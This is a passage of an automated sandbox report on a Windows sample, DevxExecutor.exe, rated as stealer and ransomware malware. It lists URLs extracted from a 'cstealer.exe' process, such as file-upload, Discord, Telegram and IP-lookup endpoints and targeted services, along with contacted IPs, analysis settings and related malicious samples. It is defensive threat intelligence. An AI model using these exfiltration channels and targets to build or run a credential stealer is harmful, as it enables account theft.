                                                                                        http://google.com/cstealer.exe, 00000003.00000003.2527962136.00000271DA17F000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000003.00000003.2537885870.00000271DA18C000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000003.00000003.2473409999.00000271DA17D000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000003.00000003.2519598138.00000271DA17E000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000003.00000003.2537371997.00000271DA185000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000003.00000003.2177398207.00000271DA184000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000003.00000003.2501756441.00000271DA17D000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000003.00000003.2179117059.00000271DA183000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000003.00000003.2176664163.00000271DA486000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000003.00000003.2183488711.00000271DA183000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2215320232.0000020102DEC000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2287998421.0000020102DFD000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2275737763.0000020102DD1000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2218139223.0000020102DD1000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2221688107.0000020102DD1000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2290930130.0000020102DFF000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2219861394.0000020102DD1000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2272438628.0000020102DD1000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 
00000009.00000003.2287046856.0000020102DD2000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2220789143.0000020102DD1000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2282192132.0000020102DD1000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                          high
                                                                                          https://mahler:8092/site-updates.pycstealer.exe, 00000003.00000002.2685159509.00000271DA4C1000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000003.00000003.2552853520.00000271D9E61000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000003.00000003.2454347629.00000271D9E5F000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000003.00000003.2496638039.00000271DA4C1000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000003.00000003.2526154847.00000271DA4C1000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000003.00000003.2407518867.00000271D9E5D000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000003.00000003.2465182617.00000271DA4C1000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000003.00000003.2534726372.00000271D9E5F000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000003.00000003.2475893944.00000271DA4C1000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000003.00000002.2626607283.00000271D9E63000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000003.00000003.2437236490.00000271DA4C1000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2278585948.0000020102D69000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2288716798.0000020102D73000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2275737763.0000020102CF6000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2219438369.0000020102C45000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2219297848.0000020103202000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2272438628.0000020102CF5000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                          • Avira URL Cloud: safe
                                                                                          low
                                                                                          https://api.gofile.io/getServerrcstealer.exe, 00000003.00000003.2172766781.00000271D9FB6000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000003.00000002.2648903466.00000271DA037000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000003.00000003.2184604455.00000271D9FC1000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000003.00000003.2539385237.00000271DA035000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000003.00000003.2494640620.00000271DA030000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2218654025.0000020102CE3000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2280639177.0000020102D0C000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2208622315.0000020102CB6000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2218277639.0000020102C63000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2211211396.0000020102CB6000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2275737763.0000020102CF6000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2219438369.0000020102C63000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2216090546.0000020102C63000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2290594631.0000020102D0D000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000002.2321140918.0000020102D0D000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2272438628.0000020102CF5000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                            high
                                                                                            http://.../back.jpegcstealer.exe, 00000003.00000003.2183488711.00000271DA11F000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000003.00000002.2700205546.00000271DA8A0000.00000004.00001000.00020000.00000000.sdmp, cstealer.exe, 00000009.00000002.2386235093.0000020103570000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                            • Avira URL Cloud: safe
                                                                                            low
                                                                                            https://netflix.com)zcstealer.exe, 00000003.00000003.2172766781.00000271D9FB6000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000003.00000002.2648903466.00000271DA037000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000003.00000003.2184604455.00000271D9FC1000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000003.00000003.2539385237.00000271DA035000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000003.00000003.2494640620.00000271DA030000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2218654025.0000020102CE3000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2280639177.0000020102D0C000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2208622315.0000020102CB6000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2218277639.0000020102C63000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2211211396.0000020102CB6000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2275737763.0000020102CF6000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2219438369.0000020102C63000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2216090546.0000020102C63000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2290594631.0000020102D0D000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000002.2321140918.0000020102D0D000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2272438628.0000020102CF5000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                            • Avira URL Cloud: safe
                                                                                            low
                                                                                            https://www.python.org/download/releases/2.3/mro/.cstealer.exe, 00000003.00000003.2170388540.00000271D9E14000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000003.00000003.2170115313.00000271D9DE7000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000003.00000003.2170290196.00000271D9E13000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000003.00000002.2607686027.00000271D9960000.00000004.00001000.00020000.00000000.sdmp, cstealer.exe, 00000003.00000003.2170218167.00000271D9E14000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000003.00000003.2170115313.00000271D9E13000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000003.00000003.2170290196.00000271D9DE7000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000008.00000003.2195916443.00000170DBC4E000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000008.00000002.2220157695.00000170DB7C4000.00000004.00001000.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2197454135.0000020102A3F000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2197231319.0000020102A3F000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000002.2312005258.00000201025C0000.00000004.00001000.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2197406606.0000020102A6B000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2197166727.0000020102A6B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                              high
                                                                                              https://httpbin.org/postcstealer.exe, 00000003.00000003.2172766781.00000271D9FB6000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000003.00000003.2184604455.00000271D9FC1000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000003.00000002.2647937867.00000271DA031000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000003.00000003.2544001972.00000271DA031000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000003.00000003.2553966495.00000271DA031000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000003.00000003.2494640620.00000271DA030000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2215216888.0000020102AB5000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2212971646.0000020102AC6000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2214455444.0000020102AC6000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2274584655.0000020102AB5000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2278980759.0000020102AB5000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2221596067.0000020102AB5000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2217913546.0000020102AB5000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2280237050.0000020102AC8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                high
                                                                                                https://api.ipify.orgrcstealer.exe, 00000003.00000003.2172766781.00000271D9FB6000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000003.00000002.2648903466.00000271DA037000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000003.00000003.2184604455.00000271D9FC1000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000003.00000003.2539385237.00000271DA035000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000003.00000003.2494640620.00000271DA030000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2218654025.0000020102CE3000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2280639177.0000020102D0C000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2208622315.0000020102CB6000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2218277639.0000020102C63000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2211211396.0000020102CB6000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2275737763.0000020102CF6000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2219438369.0000020102C63000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2216090546.0000020102C63000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2290594631.0000020102D0D000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000002.2321140918.0000020102D0D000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2272438628.0000020102CF5000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                • Avira URL Cloud: safe
                                                                                                unknown
                                                                                                https://discord.gg/cstealer.exe, 00000003.00000002.2671730030.00000271DA1A0000.00000004.00001000.00020000.00000000.sdmp, cstealer.exe, 00000009.00000002.2339606030.0000020102E30000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                • URL Reputation: safe
                                                                                                unknown
                                                                                                https://discordapp.com/api/v6/users/cstealer.exe, 00000003.00000003.2172766781.00000271D9FB6000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000003.00000002.2648903466.00000271DA037000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000003.00000003.2184604455.00000271D9FC1000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000003.00000003.2539385237.00000271DA035000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000003.00000002.2671730030.00000271DA1A0000.00000004.00001000.00020000.00000000.sdmp, cstealer.exe, 00000003.00000003.2494640620.00000271DA030000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2218654025.0000020102CE3000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2280639177.0000020102D0C000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2208622315.0000020102CB6000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2218277639.0000020102C63000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000002.2339606030.0000020102E30000.00000004.00001000.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2211211396.0000020102CB6000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2275737763.0000020102CF6000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2219438369.0000020102C63000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2216090546.0000020102C63000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2290594631.0000020102D0D000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000002.2321140918.0000020102D0D000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2272438628.0000020102CF5000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                  high
                                                                                                  https://urllib3.readthedocs.io/en/latest/advanced-usage.html#tls-warningsNcstealer.exe, 00000003.00000003.2176664163.00000271DA486000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                    high
                                                                                                    https://github.com/Ousret/charset_normalizercstealer.exe, 00000003.00000003.2455332650.00000271D9E2D000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000003.00000003.2542350232.00000271D9E45000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000003.00000003.2470513280.00000271D9E3D000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000003.00000002.2625581218.00000271D9E5B000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000003.00000003.2552117911.00000271D9E57000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2273985775.0000020103198000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2222114671.0000020103198000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2217808109.0000020103199000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2286219143.000002010319B000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2281510656.000002010319A000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2215152893.0000020103182000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2273515277.0000020103198000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2219393819.0000020103199000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 0000002F.00000003.2441436084.000001CBB7EBC000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                      high
                                                                                                      https://minecraft.net)zcstealer.exe, 00000003.00000003.2172766781.00000271D9FB6000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000003.00000002.2648903466.00000271DA037000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000003.00000003.2184604455.00000271D9FC1000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000003.00000003.2539385237.00000271DA035000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000003.00000003.2494640620.00000271DA030000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2218654025.0000020102CE3000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2280639177.0000020102D0C000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2208622315.0000020102CB6000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2218277639.0000020102C63000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2211211396.0000020102CB6000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2275737763.0000020102CF6000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2219438369.0000020102C63000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2216090546.0000020102C63000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2290594631.0000020102D0D000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000002.2321140918.0000020102D0D000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2272438628.0000020102CF5000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                      • Avira URL Cloud: safe
                                                                                                      low
                                                                                                      https://yahoo.com)cstealer.exe, 00000003.00000002.2671730030.00000271DA1A0000.00000004.00001000.00020000.00000000.sdmp, cstealer.exe, 00000009.00000002.2339606030.0000020102E30000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                      • Avira URL Cloud: safe
                                                                                                      low
                                                                                                      https://netflix.com)cstealer.exe, 00000003.00000002.2671730030.00000271DA1A0000.00000004.00001000.00020000.00000000.sdmp, cstealer.exe, 00000009.00000002.2339606030.0000020102E30000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                      • Avira URL Cloud: safe
                                                                                                      low
                                                                                                      https://github.com/urllib3/urllib3/issues/2920cstealer.exe, 00000003.00000002.2675138815.00000271DA2A0000.00000004.00001000.00020000.00000000.sdmp, cstealer.exe, 00000009.00000002.2342208883.0000020102F30000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                        high
                                                                                                        https://gmail.com)cstealer.exe, 00000003.00000002.2671730030.00000271DA1A0000.00000004.00001000.00020000.00000000.sdmp, cstealer.exe, 00000009.00000002.2339606030.0000020102E30000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                        • Avira URL Cloud: safe
                                                                                                        low
                                                                                                        https://yahoo.com/cstealer.exe, 00000003.00000003.2475616285.00000271DA3F9000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000003.00000003.2475194270.00000271DA3F4000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000003.00000003.2552638116.00000271DA40A000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000003.00000003.2545364608.00000271DA401000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000003.00000002.2682591127.00000271DA401000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000003.00000003.2523478749.00000271DA3FD000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000003.00000003.2509975417.00000271DA3FC000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2219080710.00000201030AC000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2284408959.00000201030B8000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2215320232.0000020102E12000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2275737763.0000020102DD1000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2218139223.0000020102DD1000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2286124476.0000020102E14000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2276614060.0000020103094000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000002.2339153466.0000020102E1D000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2221688107.0000020102DD1000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2276235445.000002010308A000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000002.2351020325.00000201030B8000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 
00000009.00000003.2219861394.0000020102DD1000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2290986638.00000201030B8000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2272438628.0000020102DD1000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                          high
                                                                                                          https://origin.com)cstealer.exe, 00000003.00000002.2671730030.00000271DA1A0000.00000004.00001000.00020000.00000000.sdmp, cstealer.exe, 00000009.00000002.2339606030.0000020102E30000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                          • Avira URL Cloud: safe
                                                                                                          low
                                                                                                          https://pornhub.comcstealer.exe, 00000003.00000003.2172766781.00000271D9FB6000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                            high
                                                                                                            https://roblox.com)cstealer.exe, 00000003.00000002.2671730030.00000271DA1A0000.00000004.00001000.00020000.00000000.sdmp, cstealer.exe, 00000009.00000002.2339606030.0000020102E30000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                            • Avira URL Cloud: safe
                                                                                                            low
                                                                                                            https://outlook.com)cstealer.exe, 00000003.00000002.2671730030.00000271DA1A0000.00000004.00001000.00020000.00000000.sdmp, cstealer.exe, 00000009.00000002.2339606030.0000020102E30000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                            • Avira URL Cloud: safe
                                                                                                            low
                                                                                                            https://api.ipify.orgcstealer.exe, 00000003.00000002.2671730030.00000271DA1A0000.00000004.00001000.00020000.00000000.sdmp, cstealer.exe, 00000009.00000002.2339606030.0000020102E30000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                              high
                                                                                                              • No. of IPs < 25%
                                                                                                              • 25% < No. of IPs < 50%
                                                                                                              • 50% < No. of IPs < 75%
                                                                                                              • 75% < No. of IPs
IP               Domain                     Country         ASN    ASN Name         Malicious
208.95.112.1     ip-api.com                 United States   53334  TUT-ASUS         false
149.154.167.220  api.telegram.org           United Kingdom  62041  TELEGRAMRU       false
162.159.138.232  discord.com                United States   13335  CLOUDFLARENETUS  false
185.199.108.133  raw.githubusercontent.com  Netherlands     54113  FASTLYUS         false
Joe Sandbox version: 40.0.0 Tourmaline
Analysis ID: 1439028
Start date and time: 2024-05-09 17:46:08 +02:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 13m 1s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed: 159
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: DevxExecutor.exe
Detection: MAL
Classification: mal100.rans.troj.spyw.evad.winEXE@191/263@5/4
EGA Information:
• Successful, ratio: 85.7%
HCA Information: Failed
Cookbook Comments:
• Found application associated with file extension: .exe
• Exclude process from analysis (whitelisted): Conhost.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe
• Excluded IPs from analysis (whitelisted): 142.250.189.3
• Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, gstatic.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
• Execution Graph export aborted for target DevxExecutor.exe, PID 320 because it is empty
• HTTPS proxy raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
• Not all processes were analyzed; the report is missing behavior information
• Report creation exceeded maximum time and may have missing disassembly code information.
• Report size exceeded maximum capacity and may have missing behavior information.
• Report size exceeded maximum capacity and may have missing disassembly code.
• Report size getting too big, too many NtAllocateVirtualMemory calls found.
• Report size getting too big, too many NtCreateFile calls found.
• Report size getting too big, too many NtCreateKey calls found.
• Report size getting too big, too many NtEnumerateKey calls found.
• Report size getting too big, too many NtOpenFile calls found.
• Report size getting too big, too many NtOpenKeyEx calls found.
• Report size getting too big, too many NtProtectVirtualMemory calls found.
• Report size getting too big, too many NtQueryValueKey calls found.
• Report size getting too big, too many NtQueryVolumeInformationFile calls found.
• Report size getting too big, too many NtReadVirtualMemory calls found.
Time      Type             Description
17:47:28  API Interceptor  148x Sleep call for process: powershell.exe modified
17:47:32  API Interceptor  1x Sleep call for process: WMIC.exe modified
17:47:33  API Interceptor  1x Sleep call for process: setup.exe modified
17:47:38  API Interceptor  33x Sleep call for process: main.exe modified
17:47:50  Task Scheduler   Run new task: GoogleUpdateTaskMachineQC path: %ProgramFiles%\Google\Chrome\updater.exe
17:48:23  API Interceptor  35578x Sleep call for process: cmd.exe modified
17:48:23  API Interceptor  10826x Sleep call for process: WmiPrvSE.exe modified
17:48:23  API Interceptor  34823x Sleep call for process: conhost.exe modified
17:48:23  API Interceptor  23026x Sleep call for process: svchost.exe modified
17:48:23  API Interceptor  65504x Sleep call for process: cstealer.exe modified
Associated Sample Name / URL | Detection | Threat Name (context listed under each row)
Match: 208.95.112.1
Z5l5CNjOJL.exe | malicious | AgentTesla
• ip-api.com/line/?fields=hosting
lzkaYYrJbB.exe | malicious | AgentTesla
• ip-api.com/line/?fields=hosting
Teklif-Formu.jar | malicious | STRRAT
• ip-api.com/json/
kDCWV8kDTq.exe | malicious | AgentTesla
• ip-api.com/line/?fields=hosting
ct5MWdiYZC.exe | malicious | AgentTesla
• ip-api.com/line/?fields=hosting
SecuriteInfo.com.Win32.CrypterX-gen.19037.19274.exe | malicious | AgentTesla, PureLog Stealer
• ip-api.com/line/?fields=hosting
92x1AqfTUQ.exe | malicious | AgentTesla
• ip-api.com/line/?fields=hosting
Teklif-Formu.jar | malicious | STRRAT
• ip-api.com/json/
TU5V4VyQl3.exe | malicious | AgentTesla
• ip-api.com/line/?fields=hosting
17152359653a05b96d05ff5bef69786c7326d6262078875016233ef3d21642eb7337464dde415.dat-decoded.exe | malicious | AgentTesla
• ip-api.com/line/?fields=hosting
Match: 149.154.167.220
lzkaYYrJbB.exe | malicious | AgentTesla
MNhTlD222T.exe | malicious | AgentTesla, PureLog Stealer
ORDER_INQUIRY_PDF.exe | malicious | AgentTesla
rREQUESTFORQUOTATION2024.scr.exe | malicious | AgentTesla
SecuriteInfo.com.Trojan.DownLoader16.37524.18705.18225.exe | malicious | AgentTesla, PureLog Stealer
Se7CZnlXZZ.exe | malicious | AgentTesla, PureLog Stealer, zgRAT
vjk2FB3esY.exe | malicious | AgentTesla, PureLog Stealer
COMPANY PROFILE_pdf.exe | malicious | AgentTesla
kzRQODdshQ.exe | malicious | AgentTesla, PureLog Stealer
TRANSFER_PURCHASE ORDER 02052024.exe | malicious | AgentTesla
Match: 162.159.138.232
SecuriteInfo.com.Python.Stealer.1437.14994.32063.exe | malicious | Python Stealer
4PPlLk8IT5.exe | malicious | PureLog Stealer, RedLine, zgRAT
malware!!!.exe | malicious | Unknown
Jv7Z27rOoW.exe | malicious | Unknown
https://airdrop-online-altlayer-anniversary.s3.us-east-2.amazonaws.com/posten.html?cid=freetomfr@hotmail.com | malicious | Phisher
http://www.cyclic.sh/pricing | malicious | HTMLPhisher
z40Lsbgddffz3E3gUR.exe | malicious | AgentTesla
e.exe | malicious | Unknown
hesaphareketi-01.pdf.exe | malicious | PureLog Stealer, Vector Stealer
nslookup.exe | malicious | Blank Grabber
Associated Sample Name / URL | Detection | Threat Name (context listed under each row)
Match: discord.com
krampus.exe | malicious | Blank Grabber
• 162.159.136.232
ByfronExecutor.exe | malicious | Python Stealer, Discord Token Stealer, Empyrean
• 162.159.135.232
nXaujG6G1F.exe | malicious | Blank Grabber, DCRat, Umbral Stealer
• 162.159.137.232
Pine Hearts - Setup.exe | malicious | Unknown
• 162.159.128.233
Pine Hearts - Setup.exe | malicious | Unknown
• 162.159.137.232
1AyrVa6Wj3.exe | malicious | Python Stealer, Discord Token Stealer
• 162.159.136.232
launcher.jar | malicious | Unknown
• 162.159.137.232
launcher.jar | malicious | Discord Token Stealer
• 162.159.136.232
SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe | malicious | Exela Stealer, Python Stealer
• 162.159.128.233
SecuriteInfo.com.Python.Stealer.1437.14994.32063.exe | malicious | Python Stealer
• 162.159.138.232
Match: ip-api.com
Z5l5CNjOJL.exe | malicious | AgentTesla
• 208.95.112.1
